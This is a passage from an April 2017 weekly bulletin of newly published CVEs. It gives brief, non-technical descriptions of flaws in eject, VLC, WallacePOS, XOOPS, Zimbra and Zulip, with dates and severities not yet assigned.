dmcrypt-get-device, as shipped in the eject package of Debian and Ubuntu, does not check the return value of the (1) setuid or (2) setgid function, which might cause dmcrypt-get-device to execute code, which was intended to run as an unprivileged user, as root. This affects eject through 2.1.5+deb1+cvs20081104-13.1 on Debian, eject before 2.1.5+deb1+cvs20081104-13.
|
2017-03-27
|
not yet calculated
| |
vlc -- vlc
|
VideoLAN VLC media player before 2.1.5 allows remote attackers to execute arbitrary code or cause a denial of service.
|
2017-03-28
|
not yet calculated
| |
wallacepos -- wallacepos
|
A Cross-Site Scripting (XSS) was discovered in 'wallacepos v1.4.1'. The vulnerability exists due to insufficient filtration of user-supplied data (token) passed to the 'wallacepos-master/myaccount/
|
2017-03-31
|
not yet calculated
| |
xoops -- xoops
|
SQL injection vulnerability in XOOPS 2.5.7.2 and other versions before 2.5.8.1 allows remote authenticated administrators to execute arbitrary SQL commands via the url parameter to findusers.php. An example attack uses "into outfile" to create a backdoor program.
|
2017-03-30
|
not yet calculated
| |
zimbra -- zimbra_collaboration_suite
|
Zimbra Collaboration Suite (ZCS) before 8.7.4 allows remote attackers to conduct XML External Entity (XXE) attacks.
|
2017-03-29
|
not yet calculated
| |
zulip -- zulip
|
An error in the implementation of an autosubscribe feature in the check_stream_exists route of the Zulip group chat application server before 1.4.3 allowed an authenticated user to subscribe to a private stream that should have required an invitation from an existing member to join. The issue affects all previously released versions of the Zulip server.
|
2017-03-27
|
not yet calculated
|
Apr 7, 2017
CVEs for the week of 3/27 ... Severity Not Yet Assigned